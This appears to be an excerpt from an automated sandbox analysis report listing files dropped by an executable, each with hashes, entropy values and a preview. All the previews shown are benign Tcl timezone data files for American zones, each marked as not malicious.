                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):211
                                                                                                                                                                                                                              Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                              MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                              SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                              SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                              SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8682
                                                                                                                                                                                                                              Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                              SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                              SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                              SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9553
                                                                                                                                                                                                                              Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                              SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                              SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                              SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8558
                                                                                                                                                                                                                              Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                              SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                              SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                              SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                              MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                              SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                              SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                              SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                              MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                              SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                              SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                              SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):218
                                                                                                                                                                                                                              Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                              MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                              SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                              SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                              SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):460
                                                                                                                                                                                                                              Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                              MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                              SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                              SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                              SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9726
                                                                                                                                                                                                                              Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                              MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                              SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                              SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                              SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                                              Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                              MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                              SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                              SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                              SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                              MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                              SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                              SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                              SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1539
                                                                                                                                                                                                                              Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                              MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                              SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                              SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                              SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):611
                                                                                                                                                                                                                              Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                              MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                              SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                              SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                              SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1166
                                                                                                                                                                                                                              Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                              MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                              SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                              SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                              SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                              MD5:8C60DE8E522FE5D51EACD643FD8EA132
                                                                                                                                                                                                                              SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                              SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                              SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251
                                                                                                                                                                                                                              Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                              MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                              SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                              SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                              SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6745
                                                                                                                                                                                                                              Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                              SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                              SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                              SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
